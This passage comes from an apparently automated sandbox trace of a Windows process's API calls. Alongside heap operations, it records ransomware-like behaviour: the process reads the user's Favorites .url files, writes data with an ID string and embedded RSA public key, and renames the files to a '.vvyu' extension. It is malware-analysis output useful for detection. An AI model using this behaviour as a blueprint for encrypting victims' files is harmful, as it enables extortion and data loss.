hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0193.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0193.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0193.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3e40 [0193.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6290 [0193.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3e88 [0193.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62a8 [0193.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62d8 [0193.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6338 [0193.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62f0 [0193.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0193.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0193.347] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0193.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0193.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0193.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0193.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6338 [0193.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0193.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62f0 [0193.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0193.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae62d8 [0193.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0193.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0193.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0193.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0193.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0193.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0193.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0193.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0193.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0193.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0193.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0193.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0193.350] GetCurrentThreadId () returned 0x5d8 [0193.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0193.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7a88 [0193.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0193.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0193.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0193.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0193.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0193.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0193.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.350] GetCurrentThreadId () returned 0x5d8 [0193.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0193.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0193.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0193.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6338 [0193.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62d8 [0193.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0193.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62f0 [0193.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0193.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0193.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62c0 [0193.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0193.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6350 [0193.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0193.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6320 [0193.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6308 [0193.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6368 [0193.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6308 [0193.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0193.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0193.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0193.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0193.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62d8 [0193.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0193.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0193.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0193.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0193.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0193.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0193.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0193.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0193.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0193.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0193.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0193.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0193.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0193.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0193.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0193.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0193.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0193.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0193.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0193.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0193.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3e88 | out: hHeap=0x2c0000) returned 1 [0193.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0193.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0193.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0193.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0193.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0193.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0193.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0193.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.360] WriteFile (in: hFile=0x584, lpBuffer=0x3b48b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48b8*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0193.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0193.361] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.361] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0193.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0193.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0193.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.363] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.364] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.364] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.364] CloseHandle (hObject=0x584) returned 1 [0193.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0193.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0193.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0193.365] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Autos.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn autos.url.vvyu")) returned 1 [0193.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.367] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0193.371] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a2a610, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a2a610, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0193.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0193.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.371] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Entertainment.url") returned=".url" [0193.371] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.372] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0193.372] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0193.375] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.376] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0193.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.377] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.377] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0193.377] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0193.377] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.377] lstrlenA (lpString="-----BEGIN PUBLIC 